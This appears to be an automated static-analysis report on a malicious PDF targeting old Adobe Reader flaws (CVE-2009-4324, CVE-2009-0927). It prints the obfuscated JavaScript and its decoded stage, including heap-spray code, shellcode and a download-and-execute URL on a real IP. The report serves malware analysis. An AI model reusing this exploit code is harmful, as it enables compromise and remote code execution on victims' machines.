Malicious PDF — malware analysis report

Static analysis result for SHA-256 c1823c01e8d6f507…

MALICIOUS

PDF

13.3 KB First seen: 2026-05-08
MD5: 5ae4998b08198a506ae09607a0b38c50 SHA-1: 59497d4aeab456a3384c98a4893769445b1113fa SHA-256: c1823c01e8d6f507f35e8aee3c305159bc52f837a1b229a0971b164ef707f5cd
310 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL
    • http://91.228.133.56/dng290911/db1523498df7965a4ccd8abc43397f6d/d7.php?f=g — Referenced by PDF JavaScript
    • http://91.228.133.56/dng290911/db1523498df7965a4ccd8abc43397f6d/d8.php?f=n — Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0076_000.js pdf-javascript-stream PDF /JS object 76 at offset 0x38A 12576 bytes
SHA-256: 7e24e2397749aaf5e2f1c3a3962629f5b86ddf77b5f17205976ec08c6f4fba57
Preview script
First 1,000 lines of the extracted script
// Decoder alphabet: the hidden stage is stored as numeric indexes into this string
// (see the loop that reads a[z[i]] further down).
a="2_E70I8p}@]|eoF ,:4iwn'9+VvdA3-1yC=btr{>.5%lPS6B[DxNcah<f&ug(;m)s";
// w is assembled piece by piece so the name never appears as one literal:
// 'sl' + 'i' + 'c' + a[12], and a[12] is 'e', giving "slice".
w='';
w+='sl';
w+='i';
w+="c"+a[12];
// j starts as a throwaway string and is then replaced by its own [w] property,
// i.e. the slice method looked up on that string.
j='b343tb3g';
j=j[w];
z
=new Array
(26,53,37,15,1,31,13,34,22,42,58,6,29,46,46,42,58,14,33,2,18,42,58,6,41,14,33,42,58,3,41,2,18,42,58,2,23,29,18,42,58,29,29,41,14,42,58,46,18,33,4,42,58,18,4,6,47,42,58,6,47,29,4,42,58,4,33,18,4,42,58,3,4,6,47,42,58,41,46,31,33,42,58,3,46,6,47,42,58,29,29,4,6,42,58,46,46,49,47,42,58,41,2,6,47,42,58,4,29,29,33,42,58,29,29,3,18,42,58,6,31,0,33,42,58,31,41,2,2,42,58,14,14,31,4,42,58,47,6,14,14,42,58,18,4,6,47,42,58,33,29,29,4,42,58,29,23,18,46,42,58,3,41,4,46,42,58,6,3,14,47,42,58,0,18,29,18,42,58,2,18,6,41,42,58,41,31,3,41,42,58,2,47,2,23,42,58,41,31,18,33,42,58,6,47,41,46,42,58,29,33,3,41,42,58,3,18,6,47,42,58,3,6,29,41,42,58,14,41,4,29,42,58,6,47,41,46,42,58,0,4,3,46,42,58,14,41,4,29,42,58,33,23,29,29,42,58,18,31,18,23,42,58,28,49,14,33,42,58,33,41,4,29,42,58,49,47,29,29,42,58,47,2,4,14,42,58,29,6,31,4,42,58,3,18,14,0,42,58,33,31,4,6,42,58,4,49,33,47,42,58,49,28,4,29,42,58,2,47,18,4,42,58,29,47,14,31,42,58,3,41,31,14,42,58,41,2,2,46,42,58,41,2,6,47,42,58,4,29,0,18,42,58,46,46,49,49,42,58,4,33,6,47,42,58,6,49,18,47,42,58,2,33,18,46,42,58,41,18,14,14,42,58,4,33,0,18,42,58,49,6,6,47,42,58,49,49,4,29,42,58,4,18,6,47,42,58,4,29,6,47,42,58,28,47,33,41,42,58,41,23,41,2,42,58,2,47,33,29,42,58,28,49,41,29,42,58,46,6,6,47,42,58,6,4,0,4,42,58,4,33,3,49,42,58,3,18,29,29,42,58,23,46,4,29,42,58,14,29,2,47,42,58,46,6,6,47,42,58,6,47,4,6,42,58,46,28,14,3,42,58,41,23,4,41,42,58,23,6,2,6,42,58,14,14,14,14,42,58,2,0,14,14,42,58,2,6,14,23,42,58,4,4,4,4,42,58,4,4,4,4,42,58,41,4,41,6,42,58,18,4,46,28,42,58,14,14,46,6,42,58,4,4,4,4,42,58,41,4,4,4,42,58,33,4,6,29,42,58,41,4,31,23,42,58,6,47,41,41,42,58,6,47,2,33,42,58,31,4,41,2,42,58,33,29,6,29,42,58,14,14,4,41,42,58,46,6,2,29,42,58,46,2,46,14,42,58,4,4,4,4,42,58,3,41,46,6,42,58,46,33,3,0,42,58,41,18,46,49,42,58,31,46,14,14,42,58,33,18,6,29,42,58,6,47,4,6,42,58,2,6,2,6,42,58,14,14,46,31,42,58,14,14,14,14,42,58,4,0,2,47,42,58,3,0,2,47,42,58,2,33,6,31,42,58,4,31,4,18,42,58,4,4,4,4,42,58,41,33,6,49,42,58,4,33,0,18,42,58,4,18,33,3,42,58,3,0,0,1
8,42,58,46,3,46,41,42,58,33,3,3,29,42,58,0,18,18,18,42,58,3,46,4,18,42,58,29,29,3,0,42,58,33,3,29,0,42,58,0,18,18,18,42,58,0,4,4,6,42,58,3,29,0,49,42,58,41,29,0,4,42,58,14,6,46,6,42,58,4,4,4,4,42,58,14,14,4,4,42,58,4,33,41,46,42,58,2,6,6,47,42,58,33,23,29,29,42,58,33,3,41,31,42,58,31,49,18,18,42,58,3,3,4,4,42,58,46,0,3,4,42,58,33,3,3,18,42,58,31,49,18,18,42,58,0,2,4,41,42,58,46,33,46,18,42,58,33,46,46,33,42,58,31,49,18,18,42,58,4,4,4,23,42,58,6,28,41,23,42,58,4,18,33,31,42,58,6,6,29,4,42,58,31,49,18,18,42,58,18,31,4,18,42,58,46,28,41,31,42,58,46,28,4,4,42,58,41,29,4,4,42,58,46,28,41,3,42,58,14,14,4,4,42,58,31,18,41,46,42,58,33,4,6,41,42,58,31,46,3,41,42,58,4,4,46,28,42,58,14,14,41,29,42,58,4,18,41,46,42,58,4,4,46,28,42,58,2,47,6,29,42,58,41,29,4,33,42,58,41,46,14,14,42,58,6,29,4,18,42,58,4,33,33,29,42,58,4,0,2,47,42,58,31,29,2,47,42,58,6,4,18,3,42,58,4,4,29,14,42,58,14,28,3,41,42,58,6,4,18,3,42,58,4,4,29,14,42,58,33,18,3,41,42,58,4,4,46,28,42,58,14,2,46,28,42,58,41,46,14,14,42,58,2,6,4,6,42,58,14,2,23,33,42,58,14,14,14,14,42,58,18,2,6,2,42,58,2,33,4,2,42,58,14,2,23,6,42,58,4,2,6,28,42,58,46,14,6,23,42,58,47,49,4,31,42,58,33,28,29,29,42,58,41,47,6,28,42,58,33,46,31,47,42,58,3,23,18,46,42,58,31,28,29,46,42,58,3,4,0,14,42,58,3,18,46,6,42,58,3,4,3,18,42,58,0,14,29,28,42,58,29,23,0,14,42,58,0,2,29,31,42,58,29,0,29,0,42,58,0,2,29,6,42,58,29,29,29,31,42,58,0,2,29,29,42,58,29,46,29,41,42,58,46,18,0,14,42,58,46,3,46,2,42,58,29,23,29,0,42,58,29,23,29,4,42,58,29,31,29,31,42,58,46,18,0,14,42,58,29,31,46,0,42,58,29,0,29,41,42,58,29,18,29,29,42,58,29,6,29,23,42,58,46,46,46,18,42,58,29,23,29,3,42,58,29,41,29,46,42,58,29,18,46,31,42,58,46,29,46,29,42,58,29,6,46,18,42,58,46,0,46,31,42,58,29,18,46,29,42,58,29,29,29,29,42,58,29,3,29,23,42,58,29,46,46,46,42,58,0,14,46,18,42,58,29,3,46,18,42,58,3,4,0,2,42,58,3,4,46,6,42,58,46,46,29,14,42,58,46,3,29,49,42,58,4,4,4,4,22,61,26,53,37,15,1,0,13,34,22,42,58,6,29,46,46,42,58,14,33,2,18,42,58,6,41,14,33,42,58,3,41,2,18,42,58,2,23,29,18,42,58,29
,29,41,14,42,58,46,18,33,4,42,58,18,4,6,47,42,58,6,47,29,4,42,58,4,33,18,4,42,58,3,4,6,47,42,58,41,46,31,33,42,58,3,46,6,47,42,58,29,29,4,6,42,58,46,46,49,47,42,58,41,2,6,47,42,58,4,29,29,33,42,58,29,29,3,18,42,58,6,31,0,33,42,58,31,41,2,2,42,58,14,14,31,4,42,58,47,6,14,14,42,58,18,4,6,47,42,58,33,29,29,4,42,58,29,23,18,46,42,58,3,41,4,46,42,58,6,3,14,47,42,58,0,18,29,18,42,58,2,18,6,41,42,58,41,31,3,41,42,58,2,47,2,23,42,58,41,31,18,33,42,58,6,47,41,46,42,58,29,33,3,41,42,58,3,18,6,47,42,58,3,6,29,41,42,58,14,41,4,29,42,58,6,47,41,46,42,58,0,4,3,46,42,58,14,41,4,29,42,58,33,23,29,29,42,58,18,31,18,23,42,58,28,49,14,33,42,58,33,41,4,29,42,58,49,47,29,29,42,58,47,2,4,14,42,58,29,6,31,4,42,58,3,18,14,0,42,58,33,31,4,6,42,58,4,49,33,47,42,58,49,28,4,29,42,58,2,47,18,4,42,58,29,47,14,31,42,58,3,41,31,14,42,58,41,2,2,46,42,58,41,2,6,47,42,58,4,29,0,18,42,58,46,46,49,49,42,58,4,33,6,47,42,58,6,49,18,47,42,58,2,33,18,46,42,58,41,18,14,14,42,58,4,33,0,18,42,58,49,6,6,47,42,58,49,49,4,29,42,58,4,18,6,47,42,58,4,29,6,47,42,58,28,47,33,41,42,58,41,23,41,2,42,58,2,47,33,29,42,58,28,49,41,29,42,58,46,6,6,47,42,58,6,4,0,4,42,58,4,33,3,49,42,58,3,18,29,29,42,58,23,46,4,29,42,58,14,29,2,47,42,58,46,6,6,47,42,58,6,47,4,6,42,58,46,28,14,3,42,58,41,23,4,41,42,58,23,6,2,6,42,58,14,14,14,14,42,58,2,0,14,14,42,58,2,6,14,23,42,58,4,4,4,4,42,58,4,4,4,4,42,58,41,4,41,6,42,58,18,4,46,28,42,58,14,14,46,6,42,58,4,4,4,4,42,58,41,4,4,4,42,58,33,4,6,29,42,58,41,4,31,23,42,58,6,47,41,41,42,58,6,47,2,33,42,58,31,4,41,2,42,58,33,29,6,29,42,58,14,14,4,41,42,58,46,6,2,29,42,58,46,2,46,14,42,58,4,4,4,4,42,58,3,41,46,6,42,58,46,33,3,0,42,58,41,18,46,49,42,58,31,46,14,14,42,58,33,18,6,29,42,58,6,47,4,6,42,58,2,6,2,6,42,58,14,14,46,31,42,58,14,14,14,14,42,58,4,0,2,47,42,58,3,0,2,47,42,58,2,33,6,31,42,58,4,31,4,18,42,58,4,4,4,4,42,58,41,33,6,49,42,58,4,33,0,18,42,58,4,18,33,3,42,58,3,0,0,18,42,58,46,3,46,41,42,58,33,3,3,29,42,58,0,18,18,18,42,58,3,46,4,18,42,58,29,29,3,0,42,58,33,3,29,0,42,58,0,18,18,18,42
,58,0,4,4,6,42,58,3,29,0,49,42,58,41,29,0,4,42,58,14,6,46,6,42,58,4,4,4,4,42,58,14,14,4,4,42,58,4,33,41,46,42,58,2,6,6,47,42,58,33,23,29,29,42,58,33,3,41,31,42,58,31,49,18,18,42,58,3,3,4,4,42,58,46,0,3,4,42,58,33,3,3,18,42,58,31,49,18,18,42,58,0,2,4,41,42,58,46,33,46,18,42,58,33,46,46,33,42,58,31,49,18,18,42,58,4,4,4,23,42,58,6,28,41,23,42,58,4,18,33,31,42,58,6,6,29,4,42,58,31,49,18,18,42,58,18,31,4,18,42,58,46,28,41,31,42,58,46,28,4,4,42,58,41,29,4,4,42,58,46,28,41,3,42,58,14,14,4,4,42,58,31,18,41,46,42,58,33,4,6,41,42,58,31,46,3,41,42,58,4,4,46,28,42,58,14,14,41,29,42,58,4,18,41,46,42,58,4,4,46,28,42,58,2,47,6,29,42,58,41,29,4,33,42,58,41,46,14,14,42,58,6,29,4,18,42,58,4,33,33,29,42,58,4,0,2,47,42,58,31,29,2,47,42,58,6,4,18,3,42,58,4,4,29,14,42,58,14,28,3,41,42,58,6,4,18,3,42,58,4,4,29,14,42,58,33,18,3,41,42,58,4,4,46,28,42,58,14,2,46,28,42,58,41,46,14,14,42,58,2,6,4,6,42,58,14,2,23,33,42,58,14,14,14,14,42,58,18,2,6,2,42,58,2,33,4,2,42,58,14,2,23,6,42,58,4,2,6,28,42,58,46,14,6,23,42,58,47,49,4,31,42,58,33,28,29,29,42,58,41,47,6,28,42,58,33,46,31,47,42,58,3,23,18,46,42,58,31,28,29,46,42,58,3,4,0,14,42,58,3,18,46,6,42,58,3,4,3,18,42,58,0,14,29,28,42,58,29,23,0,14,42,58,0,2,29,31,42,58,29,0,29,0,42,58,0,2,29,6,42,58,29,29,29,31,42,58,0,2,29,29,42,58,29,46,29,41,42,58,46,18,0,14,42,58,46,3,46,2,42,58,29,23,29,0,42,58,29,23,29,4,42,58,29,31,29,31,42,58,46,18,0,14,42,58,29,31,46,0,42,58,29,0,29,41,42,58,29,18,29,29,42,58,29,6,29,23,42,58,46,46,46,18,42,58,29,23,29,3,42,58,29,41,29,46,42,58,29,18,46,31,42,58,46,29,46,29,42,58,29,6,46,18,42,58,46,0,46,31,42,58,29,18,46,29,42,58,29,29,29,29,42,58,29,3,29,23,42,58,29,46,46,46,42,58,0,14,46,18,42,58,29,6,46,18,42,58,3,4,0,2,42,58,3,4,46,6,42,58,46,46,29,14,42,58,46,2,29,49,42,58,4,4,4,4,22,61,56,58,21,52,36,19,13,21,15,1,29,13,60,63,38,26,53,37,15,1,18,13,34,53,7,7,40,26,19,12,20,12,37,25,12,37,64,19,13,21,40,36,13,45,36,37,19,21,59,60,63,61,1,18,13,34,1,18,13,40,37,12,7,43,53,52,12,60,22,40,22,16,22,22,63,61,20,54,19,43,12,
60,1,18,13,40,43,12,21,59,36,54,55,18,63,38,1,18,13,24,34,22,4,22,61,8,1,18,13,34,7,53,37,64,12,5,21,36,60,1,18,13,16,31,4,63,61,37,12,36,58,37,21,15,1,18,13,61,8,56,58,21,52,36,19,13,21,15,1,41,13,60,63,38,56,58,21,52,36,19,13,21,15,1,46,13,60,63,38,26,53,37,15,1,3,13,34,22,7,9,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,15,17,15,32,32,32,32,31,31,31,22,61,58,36,19,43,40,7,37,19,21,36,27,60,1,3,13,16,21,12,20,15,49,53,36,12,60,63,63,61,8,26,53,37,15,1,6,13,34,31,0,4,4,4,61,1,23,13,34,21,12,20,15,28,37,37,53,32,60,63,61,26,53,37,15,1,31,13,4,34,22,42,58,23,4,23,4,42,58,23,4,23,4,22,61,26,53,37,15,1,31,13,31,34,1,0,13,61,1,31,13,4,34,58,21,12,64,52,53,7,12,60,1,31,13,4,63,61,1,31,13,31,34,58,21,12,64,52,53,7,12,60,1,31,13,31,63,61,20,54,19,43,12,60,1,31,13,4,40,43,12,21,59,36,54,55,34,4,50,6,4,4,4,63,38,1,31,13,4,24,34,1,31,13,4,61,8,1,31,13,4,34,1,31,13,4,40,64,58,35,64,36,37,60,4,16,4,50,6,4,4,4,30,1,31,13,31,40,43,12,21,59,36,54,63,61,15,56,13,37,60,1,31,13,0,34,4,61,1,31,13,0,55,1,6,13,61,1,31,13,0,24,24,63,38,1,23,13,48,1,31,13,0,10,34,1,31,13,4,24,1,31,13,31,61,8,19,56,60,1,6,13,63,38,1,46,13,60,63,61,1,46,13,60,63,61,36,37,32,38,36,54,19,64,40,62,12,27,19,53,40,21,12,20,44,43,53,32,12,37,60,21,58,43,43,63,61,8,52,53,36,52,54,60,12,63,38,8,1,46,13,60,63,61,8,8,56,58,21,52,36,19,13,21,15,1,31,13,29,60,63,38,26,53,37,15,1,31,13,18,34,58,21,12,64,52,53,7,12,60,1,31,13,63,61,1,31,13,41,34,58,21,12,64,52,53,7,12,60,22,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42
,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,22,63,24,1,31,13,18,61,1,31,13,46,34,58,21,12,64,52,53,7,12,60,22,42,58,23,4,23,4,42,58,23,4,23,4,22,63,61,1,31,13,3,34,31,4,61,1,31,13,6,34,1,31,13,3,24,1,31,13,41,40,43,12,21,59,36,54,61,20,54,19,43,12,60,1,31,13,46,40,43,12,21,59,36,54,55,1,31,13,6,63,1,31,13,46,24,34,1,31,13,46,61,1,31,13,23,34,1,31,13,46,40,64,58,35,64,36,37,19,21,59,60,4,16,1,31,13,6,63,61,1,0,13,0,34,1,31,13,46,40,64,58,35,64,36,37,19,21,59,60,4,16,1,31,13,46,40,43,12,21,59,36,54,30,1,31,13,6,63,61,20,54,19,43,12,60,1,0,13,0,40,43,12,21,59,36,54,24,1,31,13,6,55,4,50,18,4,4,4,4,63,1,0,13,0,34,1,0,13,0,24,1,0,13,0,24,1,31,13,23,61,1,0,13,4,34,21,12,20,15,28,37,37,53,32,60,63,61,56,13,37,60,1,0,13,31,34,4,61,1,0,13,31,55,31,6,4,61,1,0,13,31,24,24,63,1,0,13,4,48,1,0,13,31,10,34,1,0,13,0,24,1,31,13,41,61,26,53,37,15,1,0,13,29,34,18,4,31,0,61,26,53,37,15,1,0,13,18,34,28,37,37,53,32,60,1,0,13,29,63,61,56,13,37,60,1,0,13,31,34,4,61,1,0,13,31,55,1,0,13,29,61,1,0,13,31,24,24,63,38,1,0,13,18,48,1,0,13,31,10,34,58,21,12,64,52,53,7,12,60,22,42,4,53,42,4,53,42,4,53,42,4,53,22,63,61,8,33,13,43,43,53,35,40,59,12,36,5,52,13,21,60,1,0,13,18,24,22,1,51,40,35,58,21,27,43,12,22,63,61,8,26,53,37,15,1,18,13,34,1,29,13,60,63,61,19,56,60,60,60,1,18,13,39,6,23,41,4,63,57,57,60,1,18,
13,55,23,4,41,4,63,63,11,11,60,60,1,18,13,39,34,6,4,4,4,63,57,57,60,1,18,13,55,34,6,31,4,0,63,63,63,38,1,31,13,29,60,63,61,8,12,43,64,12,15,19,56,60,60,1,18,13,39,34,23,31,4,4,63,11,11,60,1,18,13,55,34,23,0,4,4,63,11,11,60,1,18,13,39,34,6,31,4,29,63,11,11,60,1,18,13,55,34,6,31,4,3,63,63,38,1,41,13,60,63,61,8);
// s accumulates the decoded text of the next stage.
s='';
// b2 = a[12] + a[26] + 'al'. a[12] is 'e' and a[26] is 'v', so b2 is the string "eval";
// the statements are split across lines so the keyword is absent from the file as a literal.
b
=
'al';
b2
=a[12]
+
a[26]+b;for
(i=0;i<z.length;i++)
// Alphabet-index decode: each entry of z (the numeric array defined above) selects one
// character of a. The first entries 26,53,37,15 map to 'v','a','r',' '.
{s+=a[z[i]]}
// j is the detached slice method from above. Whatever value it returns is indexed with
// b2 ("eval") and the result is called on s, so the decoded text is executed as script.
// Static recovery of the stage only needs the loop above, not this call chain.
e=(j());
e=e[b2];
e(s);
generic_stage_recovery_000.js deobfuscated-js generic stage recovery alphabet-index-array from JavaScript object 76 at offset 0x38A 4469 bytes
SHA-256: 3635ce3d4a495b9dcc1ba7c03f6ba31653c2be2d262c647cbfb0d59269b27002
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3764%u702E%u7068%u663F%u673D%u0000';var 
_2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3864%u702E%u7068%u663F%u6E3D%u0000';function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}function _1o3(){var 
_1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape('%0a%0a%0a%0a');}Collab.getIcon(_2o4+'_N.bundle');}var _4o=_3o();if(((_4o>8950)&&(_4o<9050))||((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)||(_4o<=9200)||(_4o>=8103)||(_4o<=8107)){_5o();}
generic_stage_recovery_001.js deobfuscated-js generic stage recovery percent-decode from JavaScript object 76 at offset 0x38A 4461 bytes
SHA-256: eaf167ee186b02b8eb5dfd37cf0efb79c48d4a98e0b69649137bbdd4f0132b18
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
